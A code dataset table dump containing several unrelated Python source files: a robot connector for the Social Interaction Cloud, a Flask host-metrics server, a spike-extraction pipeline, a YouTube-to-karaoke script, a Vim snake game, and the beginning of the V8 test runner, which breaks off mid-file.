source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
basic_connector.py
|
from enum import Enum
from functools import partial
from queue import Queue
from threading import Condition, Event, Thread
from time import sleep
from social_interaction_cloud.abstract_connector import AbstractSICConnector
class RobotPosture(Enum):
STAND = 'Stand'
STANDINIT = 'StandInit'
STANDZERO = 'StandZero'
CROUCH = 'Crouch'
SIT = 'Sit' # only for Nao
SITONCHAIR = 'SitOnChair' # only for Nao
SITRELAX = 'SitRelax' # only for Nao
LYINGBELLY = 'LyingBelly' # only for Nao
LYINGBACK = 'LyingBack' # only for Nao
UNKNOWN = 'Unknown' # this is not a valid posture
class BasicSICConnector(AbstractSICConnector):
"""
Basic implementation of AbstractSICConnector. It serves a connector to the Social Interaction Cloud.
The base mechanism is that a callback function can be registered for each robot action. When the action returns a
result (e.g. a ActionDone event) the callback is called once and removed. Only for touch and vision events a
persistent callback can be registered.
"""
def __init__(self, server_ip: str, dialogflow_language: str = None,
dialogflow_key_file: str = None, dialogflow_agent_id: str = None):
"""
:param server_ip: IP address of Social Interaction Cloud server
:param dialogflow_language: the full language key to use in Dialogflow (e.g. en-US)
:param dialogflow_key_file: path to Google's Dialogflow key file (JSON)
:param dialogflow_agent_id: ID number of Dialogflow agent to be used (project ID)
"""
self.__listeners = {}
self.__conditions = []
self.__vision_listeners = {}
self.__touch_listeners = {}
self.robot_state = {'posture': RobotPosture.UNKNOWN,
'is_awake': False,
'battery_charge': 100,
'is_charging': False,
'hot_devices': []}
super(BasicSICConnector, self).__init__(server_ip=server_ip)
if dialogflow_language and dialogflow_key_file and dialogflow_agent_id:
self.enable_service('intent_detection')
sleep(1) # give the service some time to load
self.set_dialogflow_language(dialogflow_language)
self.set_dialogflow_key(dialogflow_key_file)
self.set_dialogflow_agent(dialogflow_agent_id)
###########################
# Event handlers #
###########################
def on_event(self, event: str) -> None:
self.__notify_listeners(event)
self.__notify_touch_listeners(event)
def on_posture_changed(self, posture: str) -> None:
self.__notify_listeners('onPostureChanged', posture)
self.robot_state['posture'] = RobotPosture[posture.upper()]
def on_audio_language(self, language_key: str) -> None:
self.__notify_listeners('onAudioLanguage', language_key)
def on_audio_intent(self, detection_result: dict) -> None:
self.__notify_listeners('onAudioIntent', detection_result)
def on_new_audio_file(self, audio_file: str) -> None:
self.__notify_listeners('onNewAudioFile', audio_file)
def on_new_picture_file(self, picture_file: str) -> None:
if not self.__vision_listeners:
self.stop_looking()
self.__notify_listeners('onNewPictureFile', picture_file)
def on_person_detected(self) -> None:
self.__notify_vision_listeners('onPersonDetected')
def on_face_recognized(self, identifier: str) -> None:
self.__notify_vision_listeners('onFaceRecognized', identifier)
def on_emotion_detected(self, emotion: str) -> None:
self.__notify_vision_listeners('onEmotionDetected', emotion)
def on_battery_charge_changed(self, percentage: int) -> None:
self.__notify_listeners('onBatteryChargeChanged', percentage)
self.robot_state['battery_charge'] = percentage
def on_charging_changed(self, is_charging: bool) -> None:
self.__notify_listeners('onChargingChanged', is_charging)
self.robot_state['is_charging'] = is_charging
def on_hot_device_detected(self, hot_devices: list) -> None:
self.__notify_listeners('onHotDeviceDetected', hot_devices)
self.robot_state['hot_devices'] = hot_devices
def on_robot_motion_recording(self, motion: bytes) -> None:
self.__notify_listeners('onRobotMotionRecording', motion)
def on_browser_button(self, button: str) -> None:
self.__notify_listeners('onBrowserButton', button)
###########################
# Speech Recognition #
###########################
def speech_recognition(self, context: str, max_duration: int, callback: callable = None) -> None:
"""
Initiate a speech recognition attempt using Google's Dialogflow using a context.
For more information on contexts see: https://cloud.google.com/dialogflow/docs/contexts-overview
The robot will stream audio for at most max_duraction seconds to Dialogflow to recognize something.
The result (or a 'fail') is returned via the callback function.
:param context: Google's Dialogflow context label (str)
:param max_duration: maximum time to listen in seconds (int)
:param callback: callback function that will be called when a result (or fail) becomes available
:return:
"""
enhanced_callback, fail_callback, lock = self.__build_speech_recording_callback(callback)
self.__register_listener('onAudioIntent', enhanced_callback)
self.__register_listener('IntentDetectionDone', fail_callback)
Thread(target=self.__recognizing, args=(context, lock, max_duration)).start()
def record_audio(self, duration: int, callback: callable = None) -> None:
"""
Records audio for a number of duration seconds. The location of the audio is returned via the callback function.
:param duration: number of second of audio that will be recorded.
:param callback: callback function that will be called when the audio is recorded.
:return:
"""
success_callback, _, lock = self.__build_speech_recording_callback(callback)
self.__register_listener('onNewAudioFile', success_callback)
Thread(target=self.__recording, args=(lock, duration)).start()
def __recognizing(self, context: str, lock: Event, max_duration: int) -> None:
self.stop_listening()
self.set_dialogflow_context(context)
self.start_listening(max_duration)
lock.wait()
def __recording(self, lock: Event, max_duration: int) -> None:
self.stop_listening()
self.set_record_audio(True)
self.start_listening(max_duration)
lock.wait()
self.set_record_audio(False)
@staticmethod
def __build_speech_recording_callback(embedded_callback: callable = None):
lock = Event()
def success_callback(*args):
if embedded_callback:
embedded_callback(*args)
lock.set()
def fail_callback():
if not lock.is_set():
if embedded_callback:
embedded_callback(None)
lock.set()
return success_callback, fail_callback, lock
###########################
# Vision #
###########################
def take_picture(self, callback: callable = None) -> None:
"""
Take a picture. Location of the stored picture is returned via callback.
:param callback:
:return:
"""
if not self.__vision_listeners:
self.stop_looking()
self.start_looking(0)
self.__register_listener('onNewPictureFile', callback)
super(BasicSICConnector, self).take_picture()
def start_face_recognition(self, callback: callable = None) -> None:
"""
Start face recognition. Each time a face is detected, the callback function is called with the recognition result.
:param callback:
:return:
"""
self.__start_vision_recognition('onFaceRecognized', callback)
def stop_face_recognition(self) -> None:
"""
Stop face recognition.
:return:
"""
self.__stop_vision_recognition('onFaceRecognized')
def start_people_detection(self, callback: callable = None) -> None:
"""
Start people detection. Each time a person is detected, the callback function is called.
:param callback:
:return:
"""
self.__start_vision_recognition('onPersonDetected', callback)
def stop_people_detection(self) -> None:
"""
Stop people detection.
:return:
"""
self.__stop_vision_recognition('onPersonDetected')
def start_emotion_detection(self, callback: callable = None) -> None:
"""
Start emotion detection. Each time an emotion becomes available the callback function is called with the emotion.
:param callback:
:return:
"""
self.__start_vision_recognition('onEmotionDetected', callback)
def stop_emotion_detection(self) -> None:
"""
Stop emotion detection.
:return:
"""
self.__stop_vision_recognition('onEmotionDetected')
def __start_vision_recognition(self, event: str, callback: callable = None) -> None:
if not self.__vision_listeners:
self.stop_looking()
self.start_looking(0)
self.__register_vision_listener(event, callback)
def __stop_vision_recognition(self, event: str) -> None:
self.__unregister_vision_listener(event)
if not self.__vision_listeners:
self.stop_looking()
###########################
# Touch #
###########################
def subscribe_touch_listener(self, touch_event: str, callback: callable) -> None:
"""
Subscribe a touch listener. The callback function will be called each time the touch_event becomes available.
:param touch_event:
:param callback:
:return:
"""
self.__touch_listeners[touch_event] = callback
def unsubscribe_touch_listener(self, touch_event: str) -> None:
"""
Unsubscribe touch listener.
:param touch_event:
:return:
"""
del self.__touch_listeners[touch_event]
###########################
# Robot actions #
###########################
def set_language(self, language_key: str, callback: callable = None) -> None:
if callback:
self.__register_listener('LanguageChanged', callback)
super(BasicSICConnector, self).set_language(language_key)
def set_idle(self, callback: callable = None) -> None:
if callback:
self.__register_listener('SetIdle', callback)
super(BasicSICConnector, self).set_idle()
def set_non_idle(self, callback: callable = None) -> None:
if callback:
self.__register_listener('SetNonIdle', callback)
super(BasicSICConnector, self).set_non_idle()
def say(self, text: str, callback: callable = None) -> None:
if callback:
self.__register_listener('TextDone', callback)
super(BasicSICConnector, self).say(text)
def say_animated(self, text: str, callback: callable = None) -> None:
if callback:
self.__register_listener('TextDone', callback)
super(BasicSICConnector, self).say_animated(text)
def do_gesture(self, gesture: str, callback: callable = None) -> None:
if callback:
self.__register_listener('GestureDone', callback)
super(BasicSICConnector, self).do_gesture(gesture)
def play_audio(self, audio_file: str, callback: callable = None) -> None:
if callback:
self.__register_listener('PlayAudioDone', callback)
super(BasicSICConnector, self).play_audio(audio_file)
def set_eye_color(self, color: str, callback: callable = None) -> None:
if callback:
self.__register_listener('EyeColourDone', callback)
super(BasicSICConnector, self).set_eye_color(color)
def set_ear_color(self, color: str, callback: callable = None) -> None:
if callback:
self.__register_listener('EarColourDone', callback)
super(BasicSICConnector, self).set_ear_color(color)
def set_head_color(self, color: str, callback: callable = None) -> None:
if callback:
self.__register_listener('HeadColourDone', callback)
super(BasicSICConnector, self).set_head_color(color)
def turn_left(self, small: bool = True, callback: callable = None) -> None:
if callback:
self.__register_listener(('Small' if small else '') + 'TurnDone', callback)
super(BasicSICConnector, self).turn_left(small)
def turn_right(self, small: bool = True, callback: callable = None) -> None:
if callback:
self.__register_listener(('Small' if small else '') + 'TurnDone', callback)
super(BasicSICConnector, self).turn_right(small)
def wake_up(self, callback: callable = None) -> None:
if callback:
self.__register_listener('WakeUpDone', callback)
super(BasicSICConnector, self).wake_up()
def rest(self, callback: callable = None) -> None:
if callback:
self.__register_listener('RestDone', callback)
super(BasicSICConnector, self).rest()
def set_breathing(self, enable: bool, callback: callable = None) -> None:
if callback:
if enable:
self.__register_listener('BreathingEnabled', callback)
else:
self.__register_listener('BreathingDisabled', callback)
super(BasicSICConnector, self).set_breathing(enable)
def go_to_posture(self, posture: Enum, speed: int = 100, callback: callable = None) -> None:
"""
The robot will try for 3 times to reach a position.
go_to_posture's callback returns a bool indicating whether the given posture was successfully reached.
"""
if callback:
self.__register_listener('GoToPostureDone', partial(self.__posture_callback,
target_posture=posture,
embedded_callback=callback))
super(BasicSICConnector, self).go_to_posture(posture.value, speed)
def __posture_callback(self, target_posture: str, embedded_callback: callable) -> None:
if self.robot_state['posture'] == target_posture: # if posture was successfully reached
embedded_callback(True) # call the listener to signal a success
else: # if the posture was not reached
embedded_callback(False) # call the listener to signal a failure
def set_stiffness(self, joints: list, stiffness: int, duration: int = 1000, callback: callable = None) -> None:
if callback:
self.__register_listener('SetStiffnessDone', callback)
super(BasicSICConnector, self).set_stiffness(joints, stiffness, duration)
def play_motion(self, motion, callback: callable = None) -> None:
if callback:
self.__register_listener('PlayMotionDone', callback)
super(BasicSICConnector, self).play_motion(motion)
def start_record_motion(self, joint_chains: list, framerate: int = 5, callback: callable = None) -> None:
if callback:
self.__register_listener('RecordMotionStarted', callback)
super(BasicSICConnector, self).start_record_motion(joint_chains, framerate)
def stop_record_motion(self, callback: callable = None) -> None:
if callback:
self.__register_listener('onRobotMotionRecording', callback)
super(BasicSICConnector, self).stop_record_motion()
def browser_show(self, html: str, callback: callable = None) -> None:
super(BasicSICConnector, self).browser_show(html)
###########################
# Robot action Listeners #
###########################
def subscribe_condition(self, condition: Condition) -> None:
"""
Subscribe a threading.Condition object that will be notified each time a registered callback is called.
:param condition: Condition object that will be notified
:return:
"""
self.__conditions.append(condition)
def unsubscribe_condition(self, condition: Condition) -> None:
"""
Unsubscribe the threading.Condition object.
:param condition: Condition object to unsubscribe
:return:
"""
if condition in self.__conditions:
self.__conditions.remove(condition)
def __notify_conditions(self) -> None:
for condition in self.__conditions:
with condition:
condition.notify()
def __register_listener(self, event: str, callback: callable) -> None:
if event in self.__listeners:
self.__listeners[event].put(callback)
else:
queue = Queue()
queue.put(callback)
self.__listeners[event] = queue
def __register_vision_listener(self, event: str, callback: callable) -> None:
self.__vision_listeners[event] = callback
def __unregister_vision_listener(self, event: str) -> None:
del self.__vision_listeners[event]
def __notify_listeners(self, event: str, *args) -> None:
# If there is a listener for the event
if event in self.__listeners and not self.__listeners[event].empty():
# only the the first one will be notified
listener = self.__listeners[event].get()
# notify the listener
listener(*args)
self.__notify_conditions()
def __notify_vision_listeners(self, event: str, *args) -> None:
if event in self.__vision_listeners:
listener = self.__vision_listeners[event]
listener(*args)
self.__notify_conditions()
def __notify_touch_listeners(self, event: str, *args) -> None:
if event in self.__touch_listeners:
listener = self.__touch_listeners[event]
listener(*args)
self.__notify_conditions()
###########################
# Management #
###########################
def start(self) -> None:
self.__clear_listeners()
super(BasicSICConnector, self).start()
def stop(self) -> None:
self.__clear_listeners()
super(BasicSICConnector, self).stop()
def __clear_listeners(self) -> None:
self.__listeners = {}
self.__conditions = []
self.__vision_listeners = {}
self.__touch_listeners = {}
|
server.py
|
import logging
from multiprocessing import Process, Queue
import requests
from flask import Blueprint, Response, request
from hoststats.collection import collect_metrics
from hoststats.stats import FORWARD_HEADER, SERVER_PORT
metrics_api = Blueprint("metrics_api", __name__)
metrics_process = None
kill_queue = None
result_queue = None
def _get_forward_host():
for key, value in request.headers.items():
if key.lower() == FORWARD_HEADER.lower():
return value
return None
def _is_forward_request():
host = _get_forward_host()
return bool(host)
def _do_forward_request():
# Note, Flask's request.host field contains the port too
original_url = request.url
target_host = _get_forward_host()
forward_url = original_url.replace(
request.host, f"{target_host}:{SERVER_PORT}"
)
# Strip out forward header and host header
forward_headers = {
k: v
for (k, v) in request.headers
if k.lower() not in [FORWARD_HEADER.lower(), "host"]
}
logging.debug(f"Forwarding request from {original_url} to {forward_url}")
logging.debug(f"Forwarding headers: {forward_headers}")
# Make the forward request
resp = requests.request(
method=request.method,
url=forward_url,
headers=forward_headers,
)
# Strip out undesired headers from the forwarded response
excluded_headers = [
"content-encoding",
"content-length",
"transfer-encoding",
"connection",
]
headers = [
(name, value)
for (name, value) in resp.headers.items()
if name.lower() not in excluded_headers
]
# Build Flask response from forwarded response
return Response(resp.content, resp.status_code, headers)
@metrics_api.route("/ping")
def ping():
if _is_forward_request():
return _do_forward_request()
return "PONG"
@metrics_api.route("/start")
def start_recording():
if _is_forward_request():
return _do_forward_request()
global metrics_process
global kill_queue
global result_queue
if metrics_process is not None:
msg = "Not starting metrics recording, already running"
logging.warn(msg)
return msg
kill_queue = Queue()
result_queue = Queue()
metrics_process = Process(
target=collect_metrics, args=(kill_queue, result_queue)
)
metrics_process.start()
return "hoststats started"
@metrics_api.route("/stop")
def stop_recording():
if _is_forward_request():
return _do_forward_request()
global metrics_process
global kill_queue
global result_queue
if metrics_process is None:
msg = "Not stopping metrics recording, not running"
logging.warn(msg)
return msg
kill_queue.put("die")
# Get the results before we join the process, otherwise if the queue buffers
# fill the program will deadlock
result_json = result_queue.get()
metrics_process.join()
metrics_process = None
kill_queue = None
result_queue = None
return result_json
|
mp_extract.py
|
# JN 2015-02-13 refactoring
from __future__ import absolute_import, print_function, division
from collections import defaultdict
from multiprocessing import Process, Queue, Value
import numpy as np
np.seterr(all='raise')
import tables
from .. import DefaultFilter
from .tools import ExtractNcsFile, OutFile, read_matfile
from .extract_spikes import extract_spikes
def save(q, ctarget):
openfiles = {}
saved = 0
pending_jobs = defaultdict(dict)
last_saved_count = defaultdict(lambda : -1)
all_data = []
while saved < ctarget:
inp = q.get()
job = inp[0]
datatuple = inp[1]
ind = len(all_data)
all_data.append(datatuple)
job.update(all_data_ind=ind)
jname = job['name']
this_name_pending_jobs = pending_jobs[jname]
jcount = job['count']
this_name_pending_jobs[jcount] = job
print('Job name: {} pending jobs: {} jnow: {}'.format(jname,
this_name_pending_jobs.keys(),
jcount))
while last_saved_count[jname] + 1 in this_name_pending_jobs:
sjob = this_name_pending_jobs[last_saved_count[jname] + 1]
data = all_data[sjob['all_data_ind']]
if not sjob['name'] in openfiles:
spoints = data[0][0].shape[1]
openfiles[sjob['name']] = OutFile(sjob['name'], sjob['filename'],
spoints, sjob['destination'])
print('saving {}, count {}'.format(sjob['name'], sjob['count']))
openfiles[sjob['name']].write(data)
all_data[sjob['all_data_ind']] = None
last_saved_count[jname] = sjob['count']
del this_name_pending_jobs[sjob['count']]
saved += 1
for fid in openfiles.values():
fid.close()
print('Save exited')
def work(q_in, q_out, count, target):
filters = {}
while count.value < target:
with count.get_lock():
count.value += 1
inp = q_in.get()
job = inp[0]
datatuple = inp[1]
ts = datatuple[2]
if not ts in filters:
filters[ts] = DefaultFilter(ts)
filt = filters[ts]
result = extract_spikes(datatuple[0],
datatuple[1],
ts, filt)
q_out.put((job, result))
print('Work exited')
def read(jobs, q):
"""
writes to q; q is read by worker processes
"""
openfiles = {}
for job in jobs:
jname = job['name']
if ('is_h5file' in job.keys()) and job['is_h5file']:
if jname not in openfiles:
openfiles[jname] = tables.open_file(job['filename'], 'r')
if openfiles[jname].root.data.ndim == 1:
fdata = openfiles[jname].root.data[job['start']:job['stop']]
else:
raise Warning('Data has wrong number of dimensions')
fdata = fdata.ravel()
sr = 32000.
ts = 1/sr
# here we need to shift the data according to job['start']
atimes = np.linspace(0, fdata.shape[0]/(sr/1000), fdata.shape[0])
atimes += job['start']/(sr/1000)
data = (fdata, atimes, ts)
job.update(filename='data_' + jname + '.h5')
elif 'is_matfile' in job.keys():
if job['is_matfile']:
fname = job['filename']
print('Reading from matfile ' + fname)
data = read_matfile(fname)
if job['scale_factor'] != 1:
print('Rescaling matfile data by {:.4f}'.
format(job['scale_factor']))
data = (data[0] * job['scale_factor'],
data[1],
data[2])
job.update(filename='data_' + jname + '.h5')
else:
if jname not in openfiles:
openfiles[jname] = ExtractNcsFile(job['filename'], job['reference'])
print('Read {} {: 7d} {: 7d}'.format(jname, job['start'], job['stop']))
data = openfiles[jname].read(job['start'], job['stop'])
job.update(filename='data_' + jname + '.h5')
q.put((job, data))
print('Read exited')
def mp_extract(jobs, nWorkers):
procs = []
ctarget = len(jobs)
count = Value('i', 0)
q_read = Queue(5)
q_work = Queue()
# start the reading process
p = Process(target=read, args=[jobs, q_read])
p.daemon = True
p.start()
# start the worker processes
for i in range(nWorkers):
p = Process(target=work, args=[q_read, q_work, count, ctarget])
p.daemon = True
p.start()
procs.append(p)
# start the saver process
p = Process(target=save, args=[q_work, ctarget])
p.daemon = True
p.start()
p.join()
for p in procs:
p.join()
|
__main__.py
|
import youtube_dl.extractor
import youtube_dl
import os
import pathlib
import tempfile
import sys
import re
import multiprocessing
from tqdm import tqdm
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
def clean_path(fname: str) -> str:
fname = re.sub("/", "\\/", fname)
fname = re.sub("\.", "\\.", fname)
if os.path.normpath(fname) != fname:
raise ValueError(fname)
s = os.path.split(fname)
if s != ("", fname):
raise ValueError(fname)
return fname
def process(url):
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
from spleeter.separator import Separator
import logging
logging.basicConfig(filename='spleeter.log', level=logging.INFO)
tmpfile = tempfile.mktemp(suffix=".m4a", dir="tmp")
try:
sys.stdout = open("log.txt", "w")
sys.stderr = open("err.txt", "w")
ydl_opts = {"outtmpl": tmpfile,
"format": "m4a", "max_downloads": 1}
print(tmpfile)
fname = None
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
ydl.download([url])
info = ydl.get_info_extractor("Youtube").extract(url)
fname = clean_path(info["title"])
# os.makedirs(info["title"])
os.rename(tmpfile, fname + ".m4a")
tmpfile = fname + ".m4a"
separator = Separator("spleeter:2stems-16kHz")
separator.separate_to_file(tmpfile, "output",
codec="mp3",
bitrate="196k")
finally:
if os.path.exists(tmpfile):
os.unlink(tmpfile)
def entrypoint():
input_data = open(sys.argv[1]).readlines()
base = os.path.expanduser(os.path.join("~", "Music", "karaoker"))
tmpdir = os.path.join(base, "tmp")
os.makedirs(base, exist_ok=True)
os.makedirs(tmpdir, exist_ok=True)
os.chdir(base)
errors = open("errors.txt", "w")
for url in tqdm(input_data):
url = url.strip()
if url:
p = multiprocessing.Process(target=process, args=(url,))
p.start()
p.join()
if p.exitcode != 0:
errors.writelines([url])
if __name__ == "__main__":
entrypoint()
|
snake.py
|
# adapted from https://gist.github.com/sanchitgangwar/2158084
from random import randint
from time import sleep
import sys, vim
from threading import Thread, Lock
sys.excepthook = lambda *args: sys.stderr.write('error %s, %s, %s\n' % args) and sys.stderr.flush()
buf = vim.current.buffer
key = 'right'
prevKey = 'right'
score = 0
snake = [[4,10], [4,9], [4,8]] # Initial snake co-ordinates
food = [10,20] # First food co-ordinates
lock = Lock()
def run_game():
global key, prevKey, score, snake, food
timeout = None
addstr(food[0], food[1], '*') # Prints the food
while key != 'esc':
lock.acquire()
if key == 'space': # If SPACE BAR is pressed, wait for another
key = None
while key != 'space':
lock.release()
sleep(timeout)
lock.acquire()
key = prevKey
lock.release()
continue
# Calculates the new coordinates of the head of the snake. NOTE: len(snake) increases.
# This is taken care of later at [1].
snake.insert(0, [snake[0][0] + (key == 'down' and 1) + (key == 'up' and -1), snake[0][1] + (key == 'left' and -1) + (key == 'right' and 1)])
# If snake crosses the boundaries, make it enter from the other side
if snake[0][0] == 0: snake[0][0] = 18
if snake[0][1] == 0: snake[0][1] = 58
if snake[0][0] == 19: snake[0][0] = 1
if snake[0][1] == 59: snake[0][1] = 1
# Exit if snake crosses the boundaries (Uncomment to enable)
#if snake[0][0] == 0 or snake[0][0] == 19 or snake[0][1] == 0 or snake[0][1] == 59: break
l = len(snake)
# If snake runs over itself
trail = snake[1:]
if snake[0] in trail:
lock.release()
break
timeout = 0.001 * (150 - (l / 5 + l /10) % 120) # Increases the speed of Snake as its length increases
prevKey = key # Previous key pressed
vim.trigger('update-screen')
lock.release()
sleep(timeout)
lock.acquire()
vim.trigger('end-game')
lock.release()
def addstr(lnum, cnum, string):
line = buf[lnum]
line = line[0:cnum] + string + line[cnum + len(string):]
buf[lnum] = line
def update():
global key, prevKey, score, snake, food
lock.acquire()
if snake[0] == food: # When snake eats the food
food = []
score += 1
while food == []:
food = [randint(1, 18), randint(1, 58)] # Calculating next food's coordinates
if food in snake: food = []
addstr(food[0], food[1], '*')
else:
last = snake.pop() # [1] If it does not eat the food, length decreases
addstr(last[0], last[1], ' ')
addstr(snake[0][0], snake[0][1], '#')
addstr(0, 2, 'Score : ' + str(score) + ' ') # Printing 'Score' and
addstr(0, 27, ' SNAKE / MOVEMENTs(hjkl) EXIT(i) PAUSE(space) ')
lock.release()
def end():
lock.acquire()
buf[:] = None
buf.append("Score - " + str(score))
buf.append("http://bitemelater.in")
lock.release()
def keypress(k):
global key
lock.acquire()
key = k
lock.release()
def start():
game = Thread(target=run_game)
game.daemon = True
game.start()
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import logging
import optparse
import os
import platform
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
from os.path import join, dirname, abspath, basename, isdir, exists
from datetime import datetime
from Queue import Queue, Empty
import utils
logger = logging.getLogger('testrunner')
VERBOSE = False
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases, flaky_tests_mode):
self.cases = cases
self.flaky_tests_mode = flaky_tests_mode
self.queue = Queue(len(cases))
for case in cases:
self.queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.flaky_failed = [ ]
self.crashed = 0
self.flaky_crashed = 0
self.terminate = False
self.lock = threading.Lock()
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print "=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
}
print "Path: %s" % "/".join(test.path)
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in xrange(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[])
threads.append(thread)
thread.start()
try:
self.RunSingle()
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=10000000)
except Exception, e:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.terminate = True
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self):
while not self.terminate:
try:
test = self.queue.get_nowait()
except Empty:
return
case = test.case
self.lock.acquire()
self.AboutToRun(case)
self.lock.release()
try:
start = datetime.now()
output = case.Run()
case.duration = (datetime.now() - start)
except IOError, e:
assert self.terminate
return
if self.terminate:
return
self.lock.acquire()
if output.UnexpectedOutput():
if FLAKY in output.test.outcomes and self.flaky_tests_mode == "dontcare":
self.flaky_failed.append(output)
if output.HasCrashed():
self.flaky_crashed += 1
else:
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces. We may need to escape more characters for this
# to work properly.
parts.append('"%s"' % part)
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print 'Running %i tests' % len(self.cases)
def Done(self):
print
for failed in self.failed:
self.PrintFailureHeader(failed.test)
if failed.output.stderr:
print "--- stderr ---"
print failed.output.stderr.strip()
if failed.output.stdout:
print "--- stdout ---"
print failed.output.stdout.strip()
print "Command: %s" % EscapeCommand(failed.command)
if failed.HasCrashed():
print "--- CRASHED ---"
if failed.HasTimedOut():
print "--- TIMEOUT ---"
if len(self.failed) == 0:
print "==="
print "=== All tests succeeded"
print "==="
else:
print
print "==="
print "=== %i tests failed" % len(self.failed)
if self.crashed > 0:
print "=== %i tests CRASHED" % self.crashed
print "==="
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print 'Starting %s...' % case.GetLabel()
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print 'Done running %s: %s' % (output.test.GetLabel(), outcome)
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class TapProgressIndicator(SimpleProgressIndicator):
def Starting(self):
logger.info('1..%i' % len(self.cases))
self._done = 0
def AboutToRun(self, case):
pass
def HasRun(self, output):
self._done += 1
command = basename(output.command[-1])
if output.UnexpectedOutput():
status_line = 'not ok %i - %s' % (self._done, command)
if FLAKY in output.test.outcomes and self.flaky_tests_mode == "dontcare":
status_line = status_line + " # TODO : Fix flaky test"
logger.info(status_line)
for l in output.output.stderr.splitlines():
logger.info('#' + l)
for l in output.output.stdout.splitlines():
logger.info('#' + l)
else:
status_line = 'ok %i - %s' % (self._done, command)
if FLAKY in output.test.outcomes:
status_line = status_line + " # TODO : Fix flaky test"
logger.info(status_line)
duration = output.test.duration
# total_seconds() was added in 2.7
total_seconds = (duration.microseconds +
(duration.seconds + duration.days * 24 * 3600) * 10**6) / 10**6
logger.info(' ---')
logger.info(' duration_ms: %d.%d' % (total_seconds, duration.microseconds / 1000))
logger.info(' ...')
def Done(self):
pass
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, flaky_tests_mode, templates):
super(CompactProgressIndicator, self).__init__(cases, flaky_tests_mode)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print self.templates['stdout'] % stdout
stderr = output.output.stderr.strip()
if len(stderr):
print self.templates['stderr'] % stderr
print "Command: %s" % EscapeCommand(output.command)
if output.HasCrashed():
print "--- CRASHED ---"
if output.HasTimedOut():
print "--- TIMEOUT ---"
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print status,
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
